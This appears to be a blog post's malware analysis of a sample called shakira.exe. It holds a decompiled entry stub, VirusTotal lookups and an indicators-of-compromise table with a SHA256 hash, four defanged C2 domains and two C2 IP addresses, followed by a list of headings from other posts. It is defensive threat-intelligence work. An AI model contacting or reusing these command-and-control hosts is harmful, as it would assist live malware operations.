  GetStartupInfoA(&local_60);
  GetModuleHandleA((LPCSTR)0x0);
  local_6c = FUN_004109ec(extraout_ECX,extraout_EDX);
                    /* WARNING: Subroutine does not return */
  exit(local_6c);

OSINT

shakira.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
53/64, https://www.virustotal.com/gui/file/a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Associated with the Armadillo malware packer.

xuat.exe
a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
Same as/Part of above file.

slade.safehousenumber[.]com
9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
GoDaddy registered domain known for phishing.

murik.portal-protection.net[.]ru
3/94, https://www.virustotal.com/gui/domain/murik.portal-protection.net.ru
Domain registered with Russian registrar RU-CENTER-RU. Known malware domain.

banana.cocolands[.]su
5/94, https://www.virustotal.com/gui/domain/banana.cocolands.su
Registered with NIC.ru domain registrar. Known malware domain.

portal.roomshowerbord[.]com
5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
Domain registered with GoDaddy. Known malware domain.

44.221.84[.]105
1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105/details
Supposedly an Amazon domestic IP. But associated with malware.

193.166.255[.]171
2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
Finnish IP serving phishing domains.

Conclusion

Definitely similar to naprava.exe. Maybe the same threat actor wrote this malware where I contracted it in the Chisinau, Moldova internet cafe.

Indicators of Compromise

AnyRun Link	https://app.any.run/tasks/abdd8821-c4aa-4f97-9d86-4eb5f1983023
File Path	..\havesit\shakira.exe
File Name	shakira.exe
SHA256	a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
C2 Domain	slade.safehousenumber[.]com
C2 Domain	murik.portal-protection.net[.]ru
C2 Domain	banana.cocolands[.]su
C2 Domain	portal.roomshowerbord[.]com
C2 IP	44.221.84[.]105
C2 IP	193.166.255[.]171

2024-02-13

Author: Ben

Application Logs

Ghidra

Conclusion of Part One

Analysis

Wireshark PCAP

Initial Conclusion

WMIC for Remote Code Execution

Detection Methods: SOC Analyst Perspective

Splunk

Azure Sentinel

Best Practices for Defense

Conclusion

Phone Number

URL Analysis

Conclusion

Reconnaissance (TA0043)

Initial Access (TA0001)

Exploit Public Facing Application (T1190)

Persistence (TA0003)

Web Shell (TA1505.003)

Conclusion

Analysis

OSINT

Conclusion

IOCs

Unimportant Intro Stuff

UAC bypass stuff

Analysis

OSINT

Conclusion

Indicators of Compromise